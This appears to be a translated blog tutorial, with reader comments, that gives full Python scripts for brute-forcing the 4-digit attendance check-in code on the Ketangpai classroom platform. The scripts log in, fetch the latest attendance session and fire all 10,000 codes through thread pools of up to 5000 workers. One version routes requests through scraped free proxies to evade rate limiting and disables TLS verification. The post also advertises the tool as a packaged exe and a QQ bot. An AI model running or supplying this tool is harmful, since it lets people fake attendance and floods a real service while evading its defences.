Brute-forcing a numeric attendance code by simulating check-in requests with a crawler
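Approach
Because brute-forcing the attendance code is limited by request throughput, the following changes were made.
Session
- A requests Session object keeps the underlying connection alive across requests, which avoids repeating the TCP three-way handshake for every request.
Multithreading
- A thread pool with 2000 worker threads sends the requests concurrently.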
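The effect of connection reuse can be seen locally without touching any real service. The sketch below is an illustration only: it uses the standard library's http.client against a throwaway local server rather than requests, and the names EchoHandler and count_connections are made up for this example. requests.Session gets the same benefit through urllib3's connection pool.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer


class EchoHandler(BaseHTTPRequestHandler):
    protocol_version = "HTTP/1.1"  # HTTP/1.1 lets a connection stay open between requests
    seen_ports = set()             # one client port per TCP connection the server saw

    def do_GET(self):
        EchoHandler.seen_ports.add(self.client_address[1])
        body = b"ok"
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the demo quiet


def count_connections(reuse, n=5):
    """Send n requests and return how many TCP connections the server observed."""
    EchoHandler.seen_ports = set()
    server = ThreadingHTTPServer(("127.0.0.1", 0), EchoHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    host, port = server.server_address
    try:
        conn = http.client.HTTPConnection(host, port)
        for _ in range(n):
            if not reuse:
                # Simulate "no session": open a fresh connection for every request.
                conn.close()
                conn = http.client.HTTPConnection(host, port)
            conn.request("GET", "/")
            conn.getresponse().read()
        conn.close()
    finally:
        server.shutdown()
        server.server_close()
    return len(EchoHandler.seen_ports)


if __name__ == "__main__":
    print("connections with reuse:", count_connections(reuse=True))
    print("connections without reuse:", count_connections(reuse=False))
```

With reuse enabled all requests travel over a single connection, so only one handshake is paid.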
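try:
    if post_sign_in("0000") == 1:  # 1 means the attendance session has already ended
        input()
        sys.exit()
    else:
        print("Brute-forcing the attendance code, please wait")
        # Create the thread pool
        with ThreadPoolExecutor(2000) as t:
            for code in range(10000):  # 0000 through 9999 inclusive
                code = '%04d' % code
                t.submit(post_sign_in, code=code)
        # Leaving the with block waits for all submitted tasks to finish
except Exception as restlt:
    print(restlt)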
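The thread-pool pattern can be tried in isolation with a stand-in check function. This is a sketch under stated assumptions: search_codes and fake_check are hypothetical names, and fake_check replaces the network call so the example runs offline. It also shows one way to let the remaining tasks skip their work once a code has been accepted, using a threading.Event.

```python
import threading
from concurrent.futures import ThreadPoolExecutor


def search_codes(check, workers=32):
    """Try every 4-digit code with `check`; return the accepted code, or None."""
    found = threading.Event()
    result = []

    def attempt(code):
        if found.is_set():   # another worker already succeeded, so skip the call
            return
        if check(code):
            result.append(code)
            found.set()

    with ThreadPoolExecutor(max_workers=workers) as pool:
        for n in range(10000):               # 0000 through 9999 inclusive
            pool.submit(attempt, "%04d" % n)  # zero-pad to four digits
    # The with block has waited for every submitted task at this point.
    return result[0] if result else None


def fake_check(code):
    """Stand-in for the real request (hypothetical): accepts exactly one code."""
    return code == "0042"


if __name__ == "__main__":
    print(search_codes(fake_check))  # prints 0042
```

Note that range(0, 9999) would stop at 9998, so the loop uses range(10000) to cover the code 9999 as well.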
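IP proxy pool
- First, crawl a large number of proxy IPs, verify that each one is reachable, and write the working ones to ip.txt. The crawling functions are as follows.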
import re
import time

import requests
from bs4 import BeautifulSoup

HEADERS = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'}

# Results accumulated across all crawled pages
ip = []
port = []
type = []


def get_url(page):
    for i in range(int(page)):
        try:
            print('Crawling page %d' % (i + 1))
            url = 'https://www.kuaidaili.com/free/inha/{}/'.format(i + 1)
            print('URL:', url)
            IP1, PORT1, TYPE1 = get_content(url)
            process_data(IP1, PORT1, TYPE1)
            print('Pausing')
            time.sleep(3)  # avoid being blocked for requesting too quickly
        except Exception as e:
            print('Crawl failed', e)


def get_content(url):
    response = requests.get(url, headers=HEADERS)
    if response.status_code == 200:
        print('Connection OK')
        soup = BeautifulSoup(response.text, 'lxml')
        contents = soup.find_all('td')
        IP = []
        PORT = []
        TYPE = []
        for content in contents:
            content = str(content)
            if re.findall(r'[0-9]*\.[0-9]*\.[0-9]*\.[0-9]*', content):
                IP.append(re.findall(r'[0-9]*\.[0-9]*\.[0-9]*\.[0-9]*', content))
            elif re.findall(r'<td data-title="PORT">', content):
                PORT.append(re.findall(r'\d+', content))
            elif re.findall(r'<td data-title="类型">', content):  # the "type" column
                TYPE.append(re.findall('[A-Z]{4,5}', content))
        return IP, PORT, TYPE
    else:
        # Returns None here; the caller's try/except reports the failure
        print('Connection failed or blocked by anti-crawling measures')


def process_data(IP, PORT, TYPE):
    for content in IP:
        ip.append(content[0])
    for content in PORT:
        port.append(content[0])
    for content in TYPE:
        type.append(content[0])
    reg = []
    for i in range(len(ip)):
        dic = {}
        dic[type[i]] = ip[i] + ':' + port[i]
        reg.append(dic)
    can_use = check_ip(reg)
    print('Number of usable IPs:', len(can_use))
    save_ip(can_use)


def check_ip(reg):
    url = 'https://www.baidu.com/'
    can_use = []
    for i in reg:
        try:
            # headers must be passed by keyword; the second positional argument is params
            response = requests.get(url, headers=HEADERS, proxies=i, timeout=1)
        except requests.exceptions.RequestException:
            continue  # skip proxies that time out or refuse the connection
        if response.status_code == 200:
            can_use.append(i)
    return can_use


def save_ip(data):
    with open('ip.txt', 'w+') as f:
        for i in data:
            f.write(str(i) + '\n')


if __name__ == '__main__':
    page = input('Number of pages to crawl: ')
    get_url(page)
    print('Crawl finished')
    print("IP proxy pool built!")
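The cell-matching step can be checked offline against a sample row. The following is a minimal sketch, not the page's real markup: SAMPLE_ROW is invented, the data-title="IP" attribute is an assumption (the code above only relies on the PORT and 类型 titles), and parse_rows is a hypothetical helper. It also uses a stricter IPv4 pattern, since `[0-9]*\.[0-9]*\.[0-9]*\.[0-9]*` accepts a bare "..." as well.

```python
import re

# Invented sample row; the real page layout may differ.
SAMPLE_ROW = (
    '<tr><td data-title="IP">118.163.120.181</td>'
    '<td data-title="PORT">58837</td>'
    '<td data-title="类型">HTTP</td></tr>'
)

CELL = re.compile(r'<td data-title="([^"]+)">([^<]*)</td>')
IPV4 = re.compile(r'^(?:\d{1,3}\.){3}\d{1,3}$')  # requires digits in all four groups


def parse_rows(html):
    """Return a list of {type: 'ip:port'} dicts, the same shape written to ip.txt."""
    proxies = []
    row = {}
    for title, text in CELL.findall(html):
        row[title] = text.strip()
        if {"IP", "PORT", "类型"} <= row.keys():  # a full row has been collected
            if IPV4.match(row["IP"]) and row["PORT"].isdigit():
                proxies.append({row["类型"]: row["IP"] + ":" + row["PORT"]})
            row = {}
    return proxies


if __name__ == "__main__":
    print(parse_rows(SAMPLE_ROW))  # [{'HTTP': '118.163.120.181:58837'}]
```

Collecting the three cells of one row together avoids the index mismatch that separate ip, port and type lists can develop when a cell fails to match.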
import ast
from random import choice

proxy_list = []
# Each line of ip.txt looks like: {'HTTP': '118.163.120.181:58837'}
with open("ip.txt") as f:
    for line in f:
        line = line.strip()
        if line:
            # Parse the dict literal written by save_ip; slicing the string by hand
            # dropped the port and the last digit of the address
            proxy_list.append(ast.literal_eval(line))

# Key step: pick a random proxy
proxy = choice(proxy_list)
# Session, url, head and data are defined in the check-in code further down
response = Session.post(url=url, headers=head, data=data, timeout=3000, proxies=proxy)
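Crawling Ketangpai
1. Logging in to Ketangpai
Inspecting the login page shows that the account and password are submitted in plaintext; no JavaScript encryption is applied.
- Get the token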
# The token identifies your personal Ketangpai account
def get_token():
    url = "https://openapiv5.ketangpai.com//UserApi/login"
    head = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Edg/99.0.1150.55"}
    data = {"email": username, "password": userpassword, "remember": "0", "code": "", "mobile": "", "type": "login", "reqtimestamp": 1650284445501}
    response = requests.post(url=url, headers=head, data=data)
    token = response.json()['data']['token']
    return token


token = get_token()
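2. Getting the course list
Parse the JSON response to list all courses for the 2021-2022 academic year, and take each course's id from that list.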
def get_courses():
    url = "https://openapiv5.ketangpai.com//CourseApi/semesterCourseList"
    head = {
        "token": token,
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Edg/99.0.1150.55"
    }
    data = {"isstudy": "1", "search": "", "semester": "2021-2022", "term": "2", "reqtimestamp": 1650284447078}
    response = requests.post(url=url, headers=head, data=data)
    courselist = response.json()["data"]
    allcourse = []
    # "序号" is the 1-based number shown to the user
    for xuhao, i in enumerate(courselist, start=1):
        allcourse.append({"序号": xuhao, "name": i["coursename"], "id": i["id"]})
    for i in allcourse:
        print('No.:', str(i['序号']).ljust(2), ' \tCourse:', i['name'])
    return allcourse
3. Getting the id of the course to check in to
allcourse = get_courses()
yourchoice = int(input("Enter the number of the course to check in to: "))
print(allcourse[yourchoice - 1])
courseid = allcourse[yourchoice - 1]["id"]
print("Course id:", courseid)
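Steps 2 and 3 can be exercised without the network by feeding a sample payload through the same logic. This is a sketch with invented data: SAMPLE mimics only the coursename and id fields the code above reads, and number_courses and pick_course_id are hypothetical helper names. It also validates the chosen number instead of indexing directly.

```python
import json

# Invented payload with the two fields the article's code reads.
SAMPLE = (
    '{"data": ['
    '{"coursename": "Operating Systems", "id": "c101"},'
    '{"coursename": "Computer Networks", "id": "c102"}'
    ']}'
)


def number_courses(payload):
    """Turn the JSON course list into numbered entries, starting at 1."""
    courses = json.loads(payload)["data"]
    return [
        {"序号": n, "name": c["coursename"], "id": c["id"]}
        for n, c in enumerate(courses, start=1)
    ]


def pick_course_id(allcourse, choice):
    """Return the id for a 1-based choice, rejecting out-of-range numbers."""
    if not 1 <= choice <= len(allcourse):
        raise ValueError("choice must be between 1 and %d" % len(allcourse))
    return allcourse[choice - 1]["id"]


if __name__ == "__main__":
    courses = number_courses(SAMPLE)
    print(pick_course_id(courses, 2))  # c102
```

Without the range check, entering 0 would silently select the last course, because allcourse[-1] is valid Python.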
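4. Sending the request that simulates a check-in
The check-in request is sent to the server through a session. A session speeds things up because the session object persists certain parameters, and the underlying connection, across requests.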
url = "https://openapiv5.ketangpai.com/AttenceApi/checkin"
head = {
    "token": token,
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Edg/99.0.1150.55"
}
Session = requests.session()


def post_sign_in(code):
    data = {
        "id": idd,  # id of the attendance session, obtained in step 5
        "code": code,
        "unusual": "",
        "latitude": "",
        "longitude": "",
        "accuracy": "",
        "appid": "",
        "clienttype": "1",
        "reqtimestamp": "1648101546"
    }
    response = Session.post(url=url, headers=head, data=data)
    message = response.json()['message']
    # print(message)
    if message == "考勤已经结束,无法再签到":  # the attendance session has ended
        print("Attendance has already ended!")
        return 1
    elif message == "访问成功":  # request succeeded
        print(code, "Checked in successfully! The attendance code is:", code)
    elif message == "考勤码不正确,请重新输入":  # wrong attendance code
        pass
    else:
        # Any other message is treated as a successful check-in
        print(code, "Checked in successfully! The attendance code is:", code)
        return 2
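The chain of string comparisons can also be written as a lookup table, which keeps the three known server messages in one place. The sketch below is an illustration only: CheckIn and classify are hypothetical names, the message strings are copied from the code above, and unlike the function above it reports unrecognized messages as UNKNOWN rather than as success.

```python
from enum import Enum


class CheckIn(Enum):
    ENDED = "ended"            # the attendance session is over
    SUCCESS = "success"        # the code was accepted
    WRONG_CODE = "wrong_code"  # the code was rejected
    UNKNOWN = "unknown"        # any message not listed below


# Message strings as they appear in the article's code.
MESSAGES = {
    "考勤已经结束,无法再签到": CheckIn.ENDED,
    "访问成功": CheckIn.SUCCESS,
    "考勤码不正确,请重新输入": CheckIn.WRONG_CODE,
}


def classify(body):
    """Map a decoded JSON response body to a CheckIn value."""
    return MESSAGES.get(body.get("message"), CheckIn.UNKNOWN)


if __name__ == "__main__":
    print(classify({"message": "访问成功"}))
    print(classify({"message": "something else"}))
```

Returning an explicit value for every branch also avoids the implicit None that the wrong-code branch returns.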
5. Getting the most recent attendance session of the selected course
def get_attence():
    urla = "https://openapiv5.ketangpai.com/SummaryApi/attence"
    da = {
        "courseid": courseid,  # the course id from step 3
        "page": "1",
        "reqtimestamp": time.time(),
        "size": "10"
    }
    res = requests.post(url=urla, headers=head, data=da)
    con = res.json()
    # print(con['data']['data'][0]['id'])
    return con['data']['data'][0]['id']  # the first record is the most recent session
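Indexing con['data']['data'][0] raises an exception when a course has no attendance records yet. A more defensive lookup might look like the sketch below; latest_attendance_id is a hypothetical helper, the sample bodies are invented, and it keeps the article's assumption that the first record is the most recent one.

```python
def latest_attendance_id(body):
    """Return the id of the first attendance record, or None if there is none."""
    records = (body.get("data") or {}).get("data") or []
    if not records:
        return None
    return records[0]["id"]


if __name__ == "__main__":
    # Invented response bodies for illustration.
    print(latest_attendance_id({"data": {"data": [{"id": "a1"}, {"id": "a0"}]}}))  # a1
    print(latest_attendance_id({"data": {"data": []}}))  # None
```

The caller can then test for None and print the "no attendance published" message directly, instead of relying on a broad except clause.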
6. Finally, brute-forcing the attendance code (multithreading is used to speed up the requests)
import sys
import threading
import time

if __name__ == '__main__':
    try:
        idd = get_attence()
    except Exception as result_:
        print("No attendance has been published for this course!")
        input()
        sys.exit()  # without an attendance id there is nothing to try
    print(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())))  # print the local time
    try:
        if post_sign_in("0000") == 1:  # 1 means the attendance session has already ended
            input()
            sys.exit()
        else:
            print("Brute-forcing the attendance code, please wait")
            # code = input("Enter the attendance code: ")
            for code in range(10000):  # 0000 through 9999 inclusive
                code = '%04d' % code
                t = threading.Thread(target=post_sign_in, kwargs={"code": code})
                t.start()
    except Exception as restlt:
        print(restlt)
Full code
Version without IP proxies
# -*- coding:utf-8 -*-
import sys
import time
from concurrent.futures import ThreadPoolExecutor
from getpass import getpass

import requests
import urllib3
from requests.adapters import HTTPAdapter

urllib3.disable_warnings()  # silence the warnings caused by verify=False below

USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Edg/99.0.1150.55"

username = input("Enter your Ketangpai account: ")
# userpassword = getpass("Enter your Ketangpai password: ")
userpassword = input("Enter your Ketangpai password: ")


# The token identifies your personal Ketangpai account
def get_token():
    url = "https://openapiv5.ketangpai.com//UserApi/login"
    head = {"User-Agent": USER_AGENT}
    data = {"email": username, "password": userpassword, "remember": "0", "code": "", "mobile": "", "type": "login", "reqtimestamp": 1650284445501}
    response = requests.post(url=url, headers=head, data=data)
    token = response.json()['data']['token']
    return token


token = get_token()


# Get the list of all courses
def get_courses():
    url = "https://openapiv5.ketangpai.com//CourseApi/semesterCourseList"
    head = {"token": token, "User-Agent": USER_AGENT}
    data = {"isstudy": "1", "search": "", "semester": "2021-2022", "term": "2", "reqtimestamp": 1650284447078}
    response = requests.post(url=url, headers=head, data=data)
    courselist = response.json()["data"]
    allcourse = []
    # "序号" is the 1-based number shown to the user
    for xuhao, i in enumerate(courselist, start=1):
        allcourse.append({"序号": xuhao, "name": i["coursename"], "id": i["id"]})
    for i in allcourse:
        print('No.:', str(i['序号']).ljust(2), ' \tCourse:', i['name'])
    return allcourse


allcourse = get_courses()
yourchoice = int(input("Enter the number of the course to check in to: "))
print(allcourse[yourchoice - 1])
courseid = allcourse[yourchoice - 1]["id"]
print("Course id:", courseid)

url = "https://openapiv5.ketangpai.com/AttenceApi/checkin"
head = {"token": token, "User-Agent": USER_AGENT}
Session = requests.session()
# Setting requests.DEFAULT_RETRIES or Session.keep_alive has no effect;
# retries are configured on the transport adapter instead
Session.mount("https://", HTTPAdapter(max_retries=5))


def get_attence():
    urla = "https://openapiv5.ketangpai.com/SummaryApi/attence"
    da = {
        "courseid": courseid,  # the course id
        "page": "1",
        "reqtimestamp": time.time(),
        "size": "10"
    }
    res = requests.post(url=urla, headers=head, data=da)
    con = res.json()
    print("Created at:", time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(int(con['data']['data'][0]['createtime']))))
    return con['data']['data'][0]['id']


def post_sign_in(code):
    data = {
        "id": idd,
        "code": code,
        "unusual": "",
        "latitude": "",
        "longitude": "",
        "accuracy": "",
        "appid": "",
        "clienttype": "1",
        "reqtimestamp": "1648101546"
    }
    response = Session.post(url=url, headers=head, data=data, verify=False, timeout=15)
    message = response.json()['message']
    # print(message)
    if message == "考勤已经结束,无法再签到":  # the attendance session has ended
        print("Attendance has already ended!")
        return 1
    elif message == "访问成功":  # request succeeded
        print(code, "Checked in successfully! The attendance code is:", code)
    elif message == "考勤码不正确,请重新输入":  # wrong attendance code
        pass
    else:
        # Any other message is treated as a successful check-in
        print(code, "Checked in successfully! The attendance code is:", code)
        return 2


if __name__ == '__main__':
    try:
        idd = get_attence()
    except Exception as result_:
        print("No attendance has been published for this course!")
        input()
        sys.exit()  # without an attendance id there is nothing to try
    print(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())))  # print the local time
    try:
        if post_sign_in("0000") == 1:  # 1 means the attendance session has already ended
            input()
            sys.exit()
        else:
            print("Brute-forcing the attendance code, please wait")
            # Create the thread pool
            with ThreadPoolExecutor(2000) as t:
                for code in range(10000):  # 0000 through 9999 inclusive
                    code = '%04d' % code
                    t.submit(post_sign_in, code=code)
            # Leaving the with block waits for all submitted tasks to finish
    except Exception as restlt:
        print(restlt)
IP proxy version
# -*- coding:utf-8 -*-
import ast
import sys
import time
from concurrent.futures import ThreadPoolExecutor
from getpass import getpass
from random import choice

import requests
import urllib3
from requests.adapters import HTTPAdapter

urllib3.disable_warnings()  # silence the warnings caused by verify=False below

USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Edg/99.0.1150.55"

proxy_list = []
# Each line of ip.txt looks like: {'HTTP': '118.163.120.181:58837'}
with open("ip.txt") as f:
    for line in f:
        line = line.strip()
        if line:
            # Parse the dict literal; slicing the string by hand dropped the port
            proxy_list.append(ast.literal_eval(line))
# print(proxy_list)

username = input("Enter your Ketangpai account: ")
# userpassword = getpass("Enter your Ketangpai password: ")
userpassword = input("Enter your Ketangpai password: ")


# The token identifies your personal Ketangpai account
def get_token():
    url = "https://openapiv5.ketangpai.com//UserApi/login"
    head = {"User-Agent": USER_AGENT}
    data = {"email": username, "password": userpassword, "remember": "0", "code": "", "mobile": "", "type": "login", "reqtimestamp": 1650284445501}
    response = requests.post(url=url, headers=head, data=data)
    token = response.json()['data']['token']
    return token


token = get_token()


# Get the list of all courses
def get_courses():
    url = "https://openapiv5.ketangpai.com//CourseApi/semesterCourseList"
    head = {"token": token, "User-Agent": USER_AGENT}
    data = {"isstudy": "1", "search": "", "semester": "2021-2022", "term": "2", "reqtimestamp": 1650284447078}
    response = requests.post(url=url, headers=head, data=data)
    courselist = response.json()["data"]
    allcourse = []
    # "序号" is the 1-based number shown to the user
    for xuhao, i in enumerate(courselist, start=1):
        allcourse.append({"序号": xuhao, "name": i["coursename"], "id": i["id"]})
    for i in allcourse:
        print('No.:', str(i['序号']).ljust(2), ' \tCourse:', i['name'])
    return allcourse


allcourse = get_courses()
yourchoice = int(input("Enter the number of the course to check in to: "))
print(allcourse[yourchoice - 1])
courseid = allcourse[yourchoice - 1]["id"]
print("Course id:", courseid)

url = "https://openapiv5.ketangpai.com/AttenceApi/checkin"
head = {
    'Connection': 'close',  # do not keep the connection open between requests
    "token": token,
    "User-Agent": USER_AGENT
}
Session = requests.session()
# Setting requests.DEFAULT_RETRIES or Session.keep_alive has no effect;
# retries are configured on the transport adapter instead
Session.mount("https://", HTTPAdapter(max_retries=5))


def get_attence():
    urla = "https://openapiv5.ketangpai.com/SummaryApi/attence"
    da = {
        "courseid": courseid,  # the course id
        "page": "1",
        "reqtimestamp": time.time(),
        "size": "10"
    }
    res = requests.post(url=urla, headers=head, data=da)
    con = res.json()
    # Index 0 is the most recent session, matching the version without proxies
    return con['data']['data'][0]['id']


def post_sign_in(code):
    data = {
        "id": idd,
        "code": code,
        "unusual": "",
        "latitude": "",
        "longitude": "",
        "accuracy": "",
        "appid": "",
        "clienttype": "1",
        "reqtimestamp": "1648101546"
    }
    proxy = choice(proxy_list)  # pick a random proxy for this request
    response = Session.post(url=url, headers=head, data=data, timeout=15, proxies=proxy, verify=False)
    message = response.json()['message']
    # print(message)
    if message == "考勤已经结束,无法再签到":  # the attendance session has ended
        print("Attendance has already ended!")
        return 1
    elif message == "访问成功":  # request succeeded
        print(code, "Checked in successfully! The attendance code is:", code)
    elif message == "考勤码不正确,请重新输入":  # wrong attendance code
        pass
    else:
        # Any other message is treated as a successful check-in
        print(code, "Checked in successfully! The attendance code is:", code)
        return 2


if __name__ == '__main__':
    try:
        idd = get_attence()
    except Exception as result_:
        print("No attendance has been published for this course!")
        input()
        sys.exit()  # without an attendance id there is nothing to try
    print(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())))  # print the local time
    try:
        if post_sign_in("0000") == 1:  # 1 means the attendance session has already ended
            input()
            sys.exit()
        else:
            print("Brute-forcing the attendance code, please wait")
            # Create the thread pool
            with ThreadPoolExecutor(5000) as t:
                for code in range(10000):  # 0000 through 9999 inclusive
                    code = '%04d' % code
                    t.submit(post_sign_in, code=code)
            # Leaving the with block waits for all submitted tasks to finish
    except Exception as restlt:
        print(restlt)
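Usage
The code has been packaged into an executable with pyinstaller -F and deployed to a QQ bot. The bot's account is 382152588.
To use it, run the Python program directly, run the packaged exe, or send the keyword "考勤" (attendance) to the QQ bot account.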
Update, 2023-03-09
Changes: faster execution, bug fixes, and improved readability and robustness.
# -*- coding:utf-8 -*-
import concurrent.futures
import logging
import threading
import time

import requests

logging.basicConfig(
    level=logging.INFO,
    format="[%(asctime)s] %(levelname)s: %(message)s",
    datefmt="%Y-%m-%d %H:%M:%S"
)

USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Edg/99.0.1150.55"

# Enter the account and password here
username = input("Enter your Ketangpai account: ")
userpassword = input("Enter your Ketangpai password: ")

# Set once the code is accepted or attendance has ended, so the remaining tasks can stop
stop_event = threading.Event()


# Simulate a login to get the token, which identifies your personal Ketangpai account
def get_token():
    url = "https://openapiv5.ketangpai.com//UserApi/login"
    head = {"User-Agent": USER_AGENT}
    data = {"email": username, "password": userpassword, "remember": "0", "code": "", "mobile": "", "type": "login", "reqtimestamp": time.time()}
    response = requests.post(url=url, headers=head, data=data)
    token = response.json()['data']['token']
    return token


token = get_token()


# Get the list of all courses
def get_all_courses(token):
    url = "https://openapiv5.ketangpai.com//CourseApi/semesterCourseList"
    headers = {"token": token, "User-Agent": USER_AGENT}
    data = {
        "isstudy": "1",
        "search": "",
        "semester": "2022-2023",
        "term": "2",
        "reqtimestamp": time.time()
    }
    response = requests.post(url=url, headers=headers, data=data)
    if response.ok:
        courselist = response.json()["data"]
        # "序号" is the 1-based number shown to the user
        allcourse = [{"序号": i + 1, "name": c["coursename"], "id": c["id"]} for i, c in enumerate(courselist)]
        return allcourse
    else:
        print("Request failed:", response.status_code)
        return None


def select_course(allcourse):
    try:
        yourchoice = int(input("Enter the number of the course to check in to: "))
        if not 1 <= yourchoice <= len(allcourse):
            raise ValueError()
        course = allcourse[yourchoice - 1]
        print(f"You selected: {course['name']}, course ID: {course['id']}")
        return course
    except ValueError:
        print("Invalid input, please run the program again")
        return None


# URL and headers for the simulated check-in request
url = "https://openapiv5.ketangpai.com/AttenceApi/checkin"
head = {"token": token, "User-Agent": USER_AGENT}
session = requests.Session()
session.headers.update(head)


# Try a single attendance code
def post_sign_in(code):
    if stop_event.is_set():  # a result is already known, so skip the request
        return 2
    data = {"id": attence_id, "code": code}
    try:
        response = session.post(url=url, data=data, timeout=3)
        message = response.json()["message"]
        if message == "考勤已经结束,无法再签到":  # the attendance session has ended
            logging.warning(f"Attendance has already ended! {code}")
            stop_event.set()
            return 1
        elif message == "访问成功":  # request succeeded
            logging.info(f"Checked in successfully! The attendance code is: {code}")
            stop_event.set()
            return 3
        elif message == "考勤码不正确,请重新输入":  # wrong attendance code
            logging.warning(f"Wrong attendance code {code}")
            return 2
        else:
            logging.error(f"Unknown error {code}")
            return 2
    except requests.exceptions.RequestException:
        logging.error(f"Network request failed {code}")
        return 2


def get_attence(courseid):
    urla = "https://openapiv5.ketangpai.com/SummaryApi/attence"
    data = {
        "courseid": courseid,  # the course id
        "page": "1",
        "reqtimestamp": time.time(),
        "size": "10"
    }
    response = session.post(url=urla, data=data, timeout=10)
    latest = response.json()["data"]["data"][0]
    logging.info(f"Fetched attendance info, title: {latest['title']}")
    return latest["id"]


if __name__ == '__main__':
    # Get the list of all courses
    allcourse = get_all_courses(token)
    if allcourse:
        for course in allcourse:
            print(course)
        # Select a course and get its id
        selected_course = select_course(allcourse)
        if selected_course:
            courseid = selected_course["id"]
            # Get the id of the most recent attendance session of that course;
            # this must stay inside the if block, otherwise courseid is undefined
            attence_id = get_attence(courseid)
            codes = [f"{code:04d}" for code in range(10000)]
            result = None
            # Thread pool with 100 workers
            with concurrent.futures.ThreadPoolExecutor(max_workers=100) as executor:
                for result in executor.map(post_sign_in, codes):
                    if result in (1, 3):  # attendance ended or check-in succeeded
                        break
            if result == 3:
                print("All threads stopped")
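So how do I use this? I can't follow it.
Just run the code with Python; you need a little bit of Python background.
Author, how do I deal with this error: line 121, in
attence_id = get_attence(courseid)
^^^^^^^^
NameError: name 'courseid' is not defined
Try debugging it. I don't seem to get this problem here; it looks like courseid was never defined.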
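One plausible cause of the error above is that courseid is only assigned inside a conditional, so it never exists when the course selection fails. The sketch below reproduces that situation in miniature; the two script strings are simplified stand-ins for the main block, not the original code.

```python
# A name assigned only inside an `if` is undefined when the condition is false.
BROKEN = '''
selected_course = None            # e.g. the user typed an invalid number
if selected_course:
    courseid = selected_course["id"]
attence_id = courseid             # runs even though courseid was never assigned
'''

FIXED = '''
selected_course = None
attence_id = None
if selected_course:
    courseid = selected_course["id"]
    attence_id = courseid         # only runs when a course was selected
'''

try:
    exec(BROKEN, {})
    error = None
except NameError as exc:
    error = str(exc)

print(error)      # name 'courseid' is not defined

exec(FIXED, {})   # completes without raising
```

Keeping every line that uses courseid inside the same if block as its assignment removes the error.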